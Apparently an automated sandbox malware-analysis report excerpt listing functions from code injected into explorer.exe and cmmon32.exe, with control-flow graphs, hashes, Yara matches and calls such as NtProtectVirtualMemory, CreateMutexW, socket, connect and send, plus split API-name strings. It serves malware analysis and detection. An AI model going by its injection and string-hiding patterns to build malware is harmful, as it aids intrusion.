                                          • Snapshot File: hcaresult_4_2_7520000_explorer.jbxd
                                          Similarity
                                          • API ID: MemoryProtectVirtual
                                          • String ID:
                                          • API String ID: 2706961497-0
                                          • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                          • Instruction ID: 51b09f26f12db24f6bd6799229a765946a63670d1078030afb853bd98dad1792
                                          • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                          • Instruction Fuzzy Hash: 37019E30628B884F8B88EF6CD48116AB7E4FBC9214F000B3EA99AC3250EB60C5414742
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 458 7555e0a-7555e38 459 7555e45-7555e6e NtProtectVirtualMemory 458->459 460 7555e40 call 7554942 458->460 461 7555e70-7555e7c 459->461 462 7555e7d-7555e8f 459->462 460->459
                                          APIs
                                          • NtProtectVirtualMemory.NTDLL ref: 07555E67
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.906043086.0000000007520000.00000040.80000000.00040000.00000000.sdmp, Offset: 07520000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7520000_explorer.jbxd
                                          Similarity
                                          • API ID: MemoryProtectVirtual
                                          • String ID:
                                          • API String ID: 2706961497-0
                                          • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                          • Instruction ID: dc7828f55e2296d49c4254466e92973de6eec1233dc77603c1c6b14bb7328c1a
                                          • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                          • Instruction Fuzzy Hash: 1001A274628B884B8B48EB3C94512A6B3E5FBCE314F000B7EE99AC3240EB21D5024782
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • ObtainUserAgentString.URLMON ref: 0754F9A0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.906043086.0000000007520000.00000040.80000000.00040000.00000000.sdmp, Offset: 07520000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7520000_explorer.jbxd
                                          Similarity
                                          • API ID: AgentObtainStringUser
                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                          • API String ID: 2681117516-319646191
                                          • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                          • Instruction ID: f0b314c84b7c9005b94a78e5e10ee6e69009d2780f8c0560a5e6d6728eedf20f
                                          • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                          • Instruction Fuzzy Hash: 7A31F171610A4D8BCB54EFA8C8987EDB7E1FB98214F40022BD85ED7240EF749645C78A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • ObtainUserAgentString.URLMON ref: 0754F9A0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.906043086.0000000007520000.00000040.80000000.00040000.00000000.sdmp, Offset: 07520000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7520000_explorer.jbxd
                                          Similarity
                                          • API ID: AgentObtainStringUser
                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                          • API String ID: 2681117516-319646191
                                          • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                          • Instruction ID: 39fd1307a672d4643eb13824b7173c892222f3ba539973ba7fa1ee02e3f521a6
                                          • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                          • Instruction Fuzzy Hash: 2721F5B1610A4D8FCB14EFA8C8947EDBBE1FF98204F80021BD85AD7250EF749605C786
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 232 754bb66-754bb68 233 754bb93-754bbb8 232->233 234 754bb6a-754bb71 232->234 236 754bbbb-754bc22 call 7552612 call 7554942 * 2 233->236 234->236 237 754bb73-754bb92 234->237 244 754bcdc 236->244 245 754bc28-754bc2b 236->245 237->233 246 754bcde-754bcf6 244->246 245->244 247 754bc31-754bcd3 call 7556da4 call 7556022 call 75563e2 call 7556022 call 75563e2 CreateMutexW 245->247 247->244 261 754bcd5-754bcda 247->261 261->246
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.906043086.0000000007520000.00000040.80000000.00040000.00000000.sdmp, Offset: 07520000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7520000_explorer.jbxd
                                          Similarity
                                          • API ID: CreateMutex
                                          • String ID: .dll$el32$kern
                                          • API String ID: 1964310414-1222553051
                                          • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                          • Instruction ID: 102c343c9ad8461ee9661b9eee68cacfd98bcb441d0b8b37d0c50807b25ff52c
                                          • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                          • Instruction Fuzzy Hash: 2E417AB0918A09CFCB54EFA8C8D97E977A0FB98300F44466AC84ADB255DE309945CB85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.906043086.0000000007520000.00000040.80000000.00040000.00000000.sdmp, Offset: 07520000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7520000_explorer.jbxd
                                          Similarity
                                          • API ID: CreateMutex
                                          • String ID: .dll$el32$kern
                                          • API String ID: 1964310414-1222553051
                                          • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                          • Instruction ID: f2237babc02754fb712f1606f0e6549a304498c7082eedf1eab71268a88674bd
                                          • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                          • Instruction Fuzzy Hash: 464139B0918A49CFDB94EFA8C499BED77F0FBA8300F44416AC84ADB255DE309945CB85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 289 755172e-7551768 290 7551788-75517ab connect 289->290 291 755176a-7551782 call 7554942 289->291 291->290
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.906043086.0000000007520000.00000040.80000000.00040000.00000000.sdmp, Offset: 07520000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7520000_explorer.jbxd
                                          Similarity
                                          • API ID: connect
                                          • String ID: conn$ect
                                          • API String ID: 1959786783-716201944
                                          • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                          • Instruction ID: 05b42c31e68f08a1832306272351ae4370f2ca83f3cf0fa701dfb42f467d6a85
                                          • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                          • Instruction Fuzzy Hash: 7D011E70618B1C8FCB94EF5CE088B55B7E0FB59314F1545AED90DCB266CA74D9818BC2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 294 7551732-7551768 295 7551788-75517ab connect 294->295 296 755176a-7551782 call 7554942 294->296 296->295
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.906043086.0000000007520000.00000040.80000000.00040000.00000000.sdmp, Offset: 07520000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7520000_explorer.jbxd
                                          Similarity
                                          • API ID: connect
                                          • String ID: conn$ect
                                          • API String ID: 1959786783-716201944
                                          • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                          • Instruction ID: 4ae147e91edbd2eb418b38051e44264ca17db90c7aa96c833bc94c094a647acb
                                          • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                          • Instruction Fuzzy Hash: 78012170618A1C8FCB84EF5CE048B55B7E0FB59314F1541AE990DCB226CA74C9818BC2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 299 755162c-755166b 300 755166d-7551685 call 7554942 299->300 301 755168b-75516a6 WSAStartup 299->301 300->301
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.906043086.0000000007520000.00000040.80000000.00040000.00000000.sdmp, Offset: 07520000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7520000_explorer.jbxd
                                          Similarity
                                          • API ID: Startup
                                          • String ID: WSAS$tart
                                          • API String ID: 724789610-2426239465
                                          • Opcode ID: eb8e01195b1b45a2b093131951349e4bfa8de15468bd518a6435d0ff3ce2d302
                                          • Instruction ID: 3b108032193c82c7aa5a933f96e0d571e71f79ac9aa71b587d9fa7384f51091b
                                          • Opcode Fuzzy Hash: eb8e01195b1b45a2b093131951349e4bfa8de15468bd518a6435d0ff3ce2d302
                                          • Instruction Fuzzy Hash: 9C016D70519A588FCB44DF1DD48CB69FBE0FB58351F2502AED809CF266C7B0C9468B96
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 304 7551632-755166b 305 755166d-7551685 call 7554942 304->305 306 755168b-75516a6 WSAStartup 304->306 305->306
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.906043086.0000000007520000.00000040.80000000.00040000.00000000.sdmp, Offset: 07520000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7520000_explorer.jbxd
                                          Similarity
                                          • API ID: Startup
                                          • String ID: WSAS$tart
                                          • API String ID: 724789610-2426239465
                                          • Opcode ID: 8ca80b95c4f802a72df079fcfff649d32c96cc10ab9ce8db75eb9f3d41236f43
                                          • Instruction ID: 7dba2e202c9b49deb472560358861190281774127eb0842555e32e075700b0b1
                                          • Opcode Fuzzy Hash: 8ca80b95c4f802a72df079fcfff649d32c96cc10ab9ce8db75eb9f3d41236f43
                                          • Instruction Fuzzy Hash: 03016D70518A588FCB44DF1CD08CB69FBE0FB58351F2541AAE40DCF266C7B0C9418B96
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 417 75516b2-75516e5 418 7551705-755172d send 417->418 419 75516e7-75516ff call 7554942 417->419 419->418
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.906043086.0000000007520000.00000040.80000000.00040000.00000000.sdmp, Offset: 07520000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7520000_explorer.jbxd
                                          Similarity
                                          • API ID: send
                                          • String ID: send
                                          • API String ID: 2809346765-2809346765
                                          • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                          • Instruction ID: 8bc88f07e434d68787b86894dc5549730b1a89767a99357dcab075f583f38449
                                          • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                          • Instruction Fuzzy Hash: 40012570518A1D8FDBC8EF1CD049B65B7E0FB58315F1545AED85DCB266C670D881CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 422 75515b2-75515ea 423 75515ec-7551604 call 7554942 422->423 424 755160a-755162b socket 422->424 423->424
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.906043086.0000000007520000.00000040.80000000.00040000.00000000.sdmp, Offset: 07520000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7520000_explorer.jbxd
                                          Similarity
                                          • API ID: socket
                                          • String ID: sock
                                          • API String ID: 98920635-2415254727
                                          • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                          • Instruction ID: 6fe92f0eb891198874225bb4d2f31febae08a00a202b53d3df8dcca00cc76c92
                                          • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                          • Instruction Fuzzy Hash: 3B014F70618A5C8FCB84EF1CE048B54BBE0FB59354F1545AEE85ECB266C7B0C981CB86
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 427 75492dd-7549320 call 7554942 430 7549326 427->430 431 75493fa-754940e 427->431 432 7549328-7549339 SleepEx 430->432 432->432 433 754933b-7549341 432->433 434 7549343-7549349 433->434 435 754934b-7549352 433->435 434->435 436 754935c-754936a call 7553f12 434->436 437 7549354-754935a 435->437 438 7549370-7549376 435->438 436->438 437->436 437->438 439 75493b7-75493bd 438->439 440 7549378-754937e 438->440 443 75493d4-75493db 439->443 444 75493bf-75493cf call 7549e72 439->444 440->439 442 7549380-754938a 440->442 442->439 446 754938c-75493b1 call 754a432 442->446 443->432 448 75493e1-75493f5 call 75490f2 443->448 444->443 446->439 448->432
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.906043086.0000000007520000.00000040.80000000.00040000.00000000.sdmp, Offset: 07520000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7520000_explorer.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                          • Instruction ID: 9601c2a416aa541c767ee004f63204e7d83541dfefa12e4ad24d520f23569347
                                          • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                          • Instruction Fuzzy Hash: E6316CB4614B0EDEDB68AF6980892EAF7A0FB95308F44426FC91DCA146C774A150CF92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.906043086.0000000007520000.00000040.80000000.00040000.00000000.sdmp, Offset: 07520000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7520000_explorer.jbxd
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                          • Instruction ID: 711bd6789ba8c8638932716f1f0eec4c742882404469c0d42fd1776ae073cc57
                                          • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                          • Instruction Fuzzy Hash: F5F0C270668A494FD788EB2CD44566AF3E0FBE9214F44063FA94DC3264DA29D5818716
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:5.4%
                                          Dynamic/Decrypted Code Coverage:1.9%
                                          Signature Coverage:0%
                                          Total number of Nodes:633
                                          Total number of Limit Nodes:86
                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,001B4BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,001B4BA7,007A002E,00000000,00000060,00000000,00000000), ref: 001BA39D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID: .z`
                                          • API String ID: 823142352-1441809116
                                          • Opcode ID: dc1552102048962117bf7a584c49d718d4a620915cc002a73c01eddb7c03af01
                                          • Instruction ID: 3e10b9903d8d76970d875feabe2ce4f7101dbe0707dad471a28c6a0d7103c836
                                          • Opcode Fuzzy Hash: dc1552102048962117bf7a584c49d718d4a620915cc002a73c01eddb7c03af01
                                          • Instruction Fuzzy Hash: 9B01BDB2200108AFCB58CF98DC95EEB7BA9EF8C754F158648FA5DD7241C631E811CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,001B4BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,001B4BA7,007A002E,00000000,00000060,00000000,00000000), ref: 001BA39D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID: .z`
                                          • API String ID: 823142352-1441809116
                                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                          • Instruction ID: a002357f8342f749a62454ad6d18d609ad189466aa7955ba1965f6bf27cce223
                                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                          • Instruction Fuzzy Hash: B2F0BDB2200208AFCB08CF88DC85EEB77ADAF8C754F158248FA1D97241C630E8118BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtReadFile.NTDLL(001B4D62,5EB65239,FFFFFFFF,001B4A21,?,?,001B4D62,?,001B4A21,FFFFFFFF,5EB65239,001B4D62,?,00000000), ref: 001BA445
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtReadFile.NTDLL(001B4D62,5EB65239,FFFFFFFF,001B4A21,?,?,001B4D62,?,001B4A21,FFFFFFFF,5EB65239,001B4D62,?,00000000), ref: 001BA445
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,001A2D11,00002000,00003000,00000004), ref: 001BA569
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtClose.NTDLL(001B4D40,?,?,001B4D40,00000000,FFFFFFFF), ref: 001BA4A5
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtClose.NTDLL(001B4D40,?,?,001B4D40,00000000,FFFFFFFF), ref: 001BA4A5
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.901741866.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000007.00000002.901741866.000000000464B000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.901741866.000000000464F000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_4530000_cmmon32.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.901741866.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000007.00000002.901741866.000000000464B000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.901741866.000000000464F000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_4530000_cmmon32.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.901741866.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000007.00000002.901741866.000000000464B000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.901741866.000000000464F000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_4530000_cmmon32.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.901741866.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000007.00000002.901741866.000000000464B000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.901741866.000000000464F000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_4530000_cmmon32.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.901741866.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000007.00000002.901741866.000000000464B000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.901741866.000000000464F000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_4530000_cmmon32.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.901741866.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000007.00000002.901741866.000000000464B000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.901741866.000000000464F000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_4530000_cmmon32.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.901741866.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000007.00000002.901741866.000000000464B000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.901741866.000000000464F000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_4530000_cmmon32.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.901741866.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000007.00000002.901741866.000000000464B000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.901741866.000000000464F000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_4530000_cmmon32.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.901741866.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000007.00000002.901741866.000000000464B000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.901741866.000000000464F000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_4530000_cmmon32.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.901741866.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000007.00000002.901741866.000000000464B000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.901741866.000000000464F000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_4530000_cmmon32.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.901741866.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000007.00000002.901741866.000000000464B000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.901741866.000000000464F000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_4530000_cmmon32.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.901741866.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000007.00000002.901741866.000000000464B000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.901741866.000000000464F000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_4530000_cmmon32.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.901741866.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000007.00000002.901741866.000000000464B000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.901741866.000000000464F000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_4530000_cmmon32.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.901741866.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000007.00000002.901741866.000000000464B000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000007.00000002.901741866.000000000464F000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_4530000_cmmon32.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

